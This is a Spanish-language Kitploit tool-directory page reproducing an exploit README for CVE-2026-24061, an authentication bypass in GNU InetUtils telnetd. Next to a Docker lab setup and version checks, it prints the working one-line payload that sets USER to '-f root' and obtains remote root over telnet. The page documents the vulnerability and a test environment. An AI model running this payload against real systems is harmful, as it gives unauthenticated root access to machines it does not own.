Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-24061 — Vulnerabilidad en GNU InetUtils telnetd Permite Acceso Root Remoto | Kitploit
Herramientas/GitHubGitHub/lucaspdiniz/cve-2026-24061
Análisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAutenticaciónHerramienta de Acceso Remoto
GitHublucaspdiniz/cve-2026-24061

CVE-2026-24061

Vulnerabilidad en GNU InetUtils telnetd Permite Acceso Root Remoto

Ver Repositorio
4hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Bypass de Autenticación en GNU InetUtils telnetd mediante Inyección de Argumentos - CVE-2026-24061 📚

Introducción

Una vulnerabilidad de inyección de argumentos recientemente identificada en telnetd de GNU InetUtils permite a los atacantes eludir la autenticación estableciendo la variable de entorno USER al valor "-f root". Como resultado, un atacante remoto no autenticado puede obtener acceso a sistemas que ejecutan el servicio telnetd vulnerable y elevar privilegios a root. Si se explota con éxito, esta falla puede permitir a los atacantes acceder a información sensible, alterar la configuración del sistema y ejecutar comandos arbitrarios, lo que potencialmente resulta en un compromiso total del sistema.

Detalle CVSSCNA (MITRE)
Puntuación Base9.8
VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Vector de AtaqueRed
Complejidad de AtaqueBaja
Privilegios RequeridosNinguno
Interacción del UsuarioNinguna
AlcanceSin cambios
Impacto de ConfidencialidadAlto
Impacto de IntegridadAlto
Impacto de DisponibilidadAlto
Versión CVSSv33.1

¿Qué sucedió?

Pudimos acceder al Commit a continuación de 2015 que muestra el cambio de código (línea 62) que creó esta vulnerabilidad.

El propósito de este readme es solo mostrar la ejecución del exploit, no cada paso que generó este CVE; sin embargo, la intención es sustituir el marcador de posición %U con el valor tomado de la variable de entorno USER. Esta variable de entorno en particular está controlada por el usuario y puede ser manipulada mediante el protocolo Telnet 🔥.

Entorno 🔓

Para esta prueba, creé 2 contenedores usando imágenes de Docker Hub, con una versión vulnerable de InetUtils.

  • Contenedor -> https://hub.docker.com/_/ubuntu
root@kitploit:~
docker run --rm -it --name vuln -p 23:23 ubuntu:22.04 bash
      apt update
      apt install build-essential wget tar
      wget http://ftp.gnu.org/gnu/inetutils/inetutils-2.5.tar.gz
      tar -xvzf inetutils-2.5.tar.gz
      cd inetutils-2.5
      ./configure
      ./configure --enable-telnet
      make clean
      make
      make install
      export PATH=$PATH:/usr/local/libexec
      apt install openbsd-inetd
      echo "telnet  stream  tcp  nowait  root  /usr/local/libexec/telnetd  telnetd" >> /etc/inetd.conf
      service openbsd-inetd restart

docker run --rm -it --name attacker ubuntu bash
      apt install telnet

Payload 💀

Con el payload a continuación, reemplazamos la variable USER y eludimos el sistema de autenticación.

root@kitploit:~
USER="-f root" telnet -a 172.17.0.3

Versión Afectada ✅

  • Telnetd en GNU InetUtils hasta 2.7 permite autenticación remota.
  • Siga la actualización para la versión de Ubuntu. -> https://ubuntu.com/security/CVE-2026-24061

Compruebe su versión de inetutils

root@kitploit:~
hostname --version
telnetd --version


Hasta la próxima :wink:

Descargar herramienta